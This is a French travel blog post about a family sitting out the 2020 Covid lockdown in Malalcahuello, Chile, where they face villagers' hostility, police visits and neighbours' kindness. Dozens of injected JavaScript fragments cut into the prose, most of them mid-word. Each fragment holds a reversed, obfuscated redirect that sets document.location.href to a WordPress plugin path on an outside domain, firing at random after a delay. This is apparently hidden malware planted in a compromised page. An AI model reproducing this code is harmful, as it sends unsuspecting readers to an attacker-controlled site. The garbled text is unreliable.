En cette fin du mois de mars, nous nous installons avec beaucoup de plaisir dans l’immense et très confortable maison que Mimi nous a trouvée. Nous sommes à 2 km du village, au calme, avec peu de voisins autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de nous. Le Chili n’a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours pas décrété de confinement généralisé, nous pourrions donc nous déplacer dans la province mais nous décidons de nous autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-confiner et de limiter au maximum les contacts. Les premières semaines passent vite, il fait beau, les enfants profitent à fond du jardin, et nous nous autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torisons de temps en temps des petites ballades dans les montagnes autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de la maison.
A Malalcahuello, comme partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout en Amérique du Sud, il y a des petites épiceries. Cela dépanne bien, ça nous permet de nous montrer un peu et de participer à l’économie du village qui est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totalement paralysée par la situation. Une fois par semaine on parcourt les 30 km qui nous séparent de Curacautin pour faire le vrai plein de provisions. On trouve toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout ce qu’il faut dans cette petite ville de 20 000 habitants.
La tension monte d’un cran quand une partie de la population de Malacahuello érige des barricades et installe un checkpoint à l’entrée du village. De nombreux panneaux « No turistas » et « Go back home » fleurissent le long de la route principale. Etant les seuls toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touristes dans le coin nous nous sentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons particulièrement visés. Mais les « Copains du Rio » (Dayan, Derek, Catherine, Diego) nous rassurent, il y a de nombreuses maisons secondaires ici et les gens du village veulent empêcher ces propriétaires de venir passer une éventuelle quarantaine ici. Les carabiniers laissent faire…
Quelques jours plus tard, en session ravitaillement à Curacautin, nous avons la confirmation que la peur gagne du terrain. Depuis le début du voyage nous nous sommes habitués à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ces gens qui, en chemin, nous font des signes ou nous prennent en photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. Les camping-cars ne sont pas communs, on passe rarement inaperçus et beaucoup de personnes nous envient de pouvoir voyager ainsi. Alice et Clément adorent faire coucou à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes ces personnes qui, très souvent, nous sourient. Cette fois-ci c’est très différent. Les visages sont fermés et les regards hostiles. A peine garés, une femme vient nous insulter et nous accuser d’être responsables de la propagation du virus… OK on a compris nous ne pouvons plus nous déplacer avec le camion. C’est difficile à accepter, depuis notre départ d’Argentine, ce mode de voyage nous a tellement souvent ouvert les portes et le cœur des gens. Aujourd’hui c’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout l’inverse.
Les copains du Rio sont encore là pour nous aider et nous emmènent avec eux dès que nous en avons besoin. Ils sont tellement adorables.
L’autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomne s’installe peu à peu, les arbres prennent leurs magnifiques couleurs rouge orangé. Notre autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-confinement se poursuit tranquillement, les journées passent vite, rythmées par l’école le matin et détente l’après-midi. Avec deux mois de retard sur l’Europe, le coronavirus se propage maintenant rapidement. Le checkpoint villageois est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours là. On sent que la tension est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours bien présente. Je profite d’un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour à l’épicerie du village pour aller parler avec « les barricadés ». Je veux m’assurer qu’ils savent qu’on est là depuis plusieurs semaines. Au même moment Alice m’appelle : « Papa viens vite y’a la police à la maison ! » Quand j’arrive la discussion est un peu surréaliste : « Etes-vous au courant qu’il y a un virus qui s’appelle Coronavirus? …. Vous ne pouvez pas rester ici. Vous devez partir. » Après quelques palabres, ils acceptent finalement que nous restions mais nous interdisent de sortir de la maison sauf pour aller faire les courses au village. Nous savons que ce qu’ils nous demandent est illégal, il n’y a pas de confinement obligatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire ici, pour cette fois nous préférons faire profil bas.
Encore une fois les copains nous viennent en aide. Ils sont révoltés par l’intervention des carabiniers. Catherine publie un message dans un groupe WhatsApp qui regroupe beaucoup d’habitants du village. Elle explique notre situation et rassure en expliquant que nous sommes au Chili depuis plusieurs mois. Le lendemain, notre cas est exposé lors d’une sorte de conseil de voisinage. Les jours suivants, c’est un véritable défilé à la maison. On nous apporte du pain, du fromage (les français adorent le fromage!!!), la voisine nous préparent des oreillettes, le sympathique Andrés nous amène 4 vélos, d’autres viennent juste nous apporter leur soutien et nous dire de les appeler en cas de soucis. Puis Derek nous laissera sa voiture pour que l’on puisse se déplacer tranquillement… C’est fou !!!
Nous sommes tellement gênés et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touchés. Nous sommes ici par choix et, contrairement à ce que nous avons dit aux carabiniers, nous pourrions rentrer si nous le souhaitions vraiment. Comparée à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous ces gens qui subissent de plein fouet le Covid, notre situation n’est vraiment pas si mauvaise. Ici les aides de l’état sont quasi inexistantes, la saison d’hiver commence et aucun d’eux ne va pouvoir travailler. On aimerait tellement partager plus avec eux mais nous tâchons de respecter notre autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-confinement. Sé fait ce qu’elle peut pour les remercier en leur cuisinant des petits plats français (Quiches, bœuf bourguignon, brioche, etc…)
Plus tard le checkpoint villageois est remplacé par un contrôle sanitaire officiel: prise de température des passagers et désinfection de la voiture systématiques. Nous concernant, l’ignorance ou la peur de certains nous feront rencontrer encore plusieurs fois les carabiniers mais peu à peu la tension redescend.
L’hiver s’installe tranquillement. Les enfants sont ravis des premières neiges, ils en profitent à fond! Quand il n’est pas « en classe » Clément passe la plus grande partie de son temps dehors à jouer dans le jardin. Il aime nos petites expéditions en vélo au village pour faire les courses, courageux, il vient même quand le temps est très mauvais. Rien n’entame son besoin de se dépenser. A part peut-être les tempêtes. Impressionnantes, violentes, elles sont de plus en plus fréquentes en ce mois de juin. La température baisse maintenant fortement, les canalisations gèlent et je me refais une amitié avec cet objet que j’ai malgré moi délaissé depuis longtemps : le sèche-cheveux…
Puis le mauvais temps s’installe beaucoup trop confortablement pour nous. Il pleut ou neige sans arrêt pendant plus de 6 semaines. On compte les heures de soleil… Le moral n’est pas au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top. Comme souvent, ce sont les filles qui montrent l’exemple. Pour garder un semblant de forme, elles organisent des séances de fitness le plus régulièrement possible. Alice adore nous cuisiner des gâteaux ou faire du pain. Plus calme que son frère, elle dévore des dizaines de livres au coin du feu.
En Juillet la situation Covid s’améliore, notre province obtient plus de libertés. On s’ouvre un peu plus et on en profite pour enfin partager quelques moments avec toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes ces personnes qui ont veillé sur nous depuis plusieurs mois maintenant. Les copains nous préparent un bel asado pour le 14 juillet, le moral remonte.
Notre voyage doit s’arrêter en août pour faire la rentrer scolaire des enfants, mais depuis plusieurs semaines une question nous envahit. Est-ce possible de continuer le voyage? Quand le Chili détaille son très prudent plan de déconfinement, nous avons réellement envie de tenter l’aventure. Il faudra plusieurs conseils de famille pour prendre la décision. Tout le monde a ses propres inquiétudes : l’instruction des enfants, le chien, la maison, le budget, le Coronavirus, etc… Nous prenons le temps de trouver des solutions. Notre soif d’aventure et notre volonté de continuer à partager ensembles des moment incroyables sont encore bien présentes.
La décision familiale est finalement prise, nous reprendrons la route mi-août pour un retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour maximum en décembre (croix de bois, croix de fer….). Il y a bien-sûr énormément d’incertitudes et nous savons que c’est un voyage différent et plus compliqué qui nous attend. Nous ne projetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons rien si ce n’est l’ambition de continuer cette aventure familiale et découvrir ensemble une partie de ce continent qui nous accueille depuis plus de 8 mois maintenant.